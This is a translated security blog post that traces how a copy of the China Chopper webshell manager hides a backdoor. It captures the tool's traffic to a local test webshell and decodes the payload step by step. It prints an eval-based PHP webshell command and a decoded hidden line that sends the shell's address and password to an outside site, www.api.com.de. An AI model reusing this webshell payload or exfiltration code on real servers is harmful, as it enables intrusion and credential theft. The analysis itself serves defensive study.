Technical Secrets: How do I analyze whether a Chinese kitchen knife contains a backdoor?

Technical Secrets: How do I analyze whether a Chinese kitchen knife contains a backdoor?

0 × 00 Preface

There is an old saying in our country that "We often walk by the river and there are no wet shoes". Many tools circulating on the Internet contain backdoors, for example, the SSH Secure Client has been exposed to have backdoors (the Putty Chinese version is cracked with backdoors to steal administrator accounts), and the backdoor is left in the tool, in this way, attackers and administrators can continuously obtain logon accounts and passwords, and obtain server and webshell permissions, so will there be a backdoor in the famous webshell management tool China kitchen knife? For more information, see the analysis in this article!

0 × 01 kitchen knife Overview

Software name: China chopper, a Chinese kitchen knife, is not a prop used to cut food and cook, but a professional website management software, widely used, easy to use, small and practical. Any website that supports dynamic scripts can be managed with a Chinese kitchen knife! Program size: 214 KB. It is used in a non-Simplified Chinese environment and is automatically switched to the English interface. UINCODE compilation, supports multi-language input display.

Official Website: www.maicaidao.com, official in 2014 to stop providing external services, the final version of the http://bbs.mgame.baidu.com/data/attachment/forum/201305/31/index.zip

0 × 02 test preparation environment

(1) install ComsenzEXP on the local machine,: http://www.comsenz.com/downloads/install/exp (2) create a new backdoor PHP file under wwwroot in the ComsenzEXP installation directory. (3) WSockExpert_Cn Program (4) encode Program (5) a chopper program with a backdoor

0 × 03 analyze and obtain the backdoor process

(1) create a new Chinese kitchen knife record

Create a new record in the Chinese kitchen knife and add a backdoor address "http: // 127.0.0.1/1. php" with the password "x", as shown in 1.

 

Figure 1 create a webshell Management Record

(2) Set WSockExpert to capture packets

Open the WSockExpert software, or select other packet capture software, select the program to listen to (open the folder icon button), in this example, select "China kitchen knife", as shown in 2, after the configuration is complete, WSockExpert starts to listen to the Chinese kitchen knife and obtain the packet and other data in the communication process.

 

Figure 2 set WSockExpert packet capture software

(3) Use a Chinese kitchen knife to open webshell

Open the webshell record http: // 127.0.0.1/1.php in the Chinese kitchen knife, as shown in 3. You can view, delete, upload, and other file operations on the computer where the webshell is located.

 

Figure 3 open webshell

(4) Obtain packet capture data

In the WSockExpert software window, you can view the captured data packet records. Select the second record, as shown in figure 4, and copy the data packet content as follows:

x=%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk%2FJHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7

The above Code contains url encoding and cannot be seen.

 

Figure 4 View data packets

(5) unpackage url data

Copy the data obtained above to Encode. 5. Select the URI type and click Decoder to decode it. Click Encoder to Encode the content in the input box.

 

Figure 5 decode url data

The decoded data is changed:

x=$_=strrev(edoced_46esab);@eval($_($_POST[z0]));&z0=QGV2YWwoYmFzZTY0X2RlY29kZSgnYVdZb0pGOURUMDlMU1VWYkoweDVhMlVuWFNFOU1TbDdjMlYwWTI5dmEybGxLQ2RNZVd0bEp5d3hLVHRBWm1sc1pTZ25hSFIwY0RvdkwzZDNkeTVoY0drdVkyOXRMbVJsTDBGd2FTNXdhSEEvVlhKc1BTY3VKRjlUUlZKV1JWSmJKMGhVVkZCZlNFOVRWQ2RkTGlSZlUwVlNWa1ZTV3lkU1JWRlZSVk5VWDFWU1NTZGRMaWNtVUdGemN6MG5MbXRsZVNna1gxQlBVMVFwS1R0OScpKTtAaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCIwIik7QHNldF90aW1lX2xpbWl0KDApO0BzZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7ZWNobygiLT58Iik7OyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9XHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO30kUi49Ilx0IjskdT0oZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKTonJzskdXNyPSgkdSk/JHVbJ25hbWUnXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Iih7JHVzcn0pIjtwcmludCAkUjs7ZWNobygifDwtIik7ZGllKCk7

Copy the decoded data after "z0 =" to the Encode input box, and select base64 decoding, as shown in 6 to obtain the data after the first base64 decoding, base64 encryption still exists in the red part.

@eval(base64_decode('aWYoJF9DT09LSUVbJ0x5a2UnXSE9MSl7c2V0Y29va2llKCdMeWtlJywxKTtAZmlsZSgnaHR0cDovL3d3dy5hcGkuY29tLmRlL0FwaS5waHA/VXJsPScuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddLicmUGFzcz0nLmtleSgkX1BPU1QpKTt9'));@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();

 

Figure 6 first base64 Decoding

Copy the base64 encryption code marked as red above to the Encode input box, select base64 for Decode, as shown in 7, and obtain the backdoor address code:

if($_COOKIE['Lyke']!=1){setcookie('Lyke',1);@file('http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST));}，

Where

http://www.api.com.de/Api.php?Url='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&Pass='.key($_POST)

This is the backdoor Receiving address. When a hacker opens webshell, the shell address and password are automatically sent to the website www.api.com.de.

 

Figure 7 obtain the backdoor address

0 × 04 postscript

Through the above analysis, we can see that the Chinese kitchen knife is left with a backdoor. When using this tool, the user will automatically send the webshell record to the specified website for receiving. Therefore, you must keep an eye on the tool to be downloaded from the Internet. It is best to put it in a virtual machine and try to download it on an official website.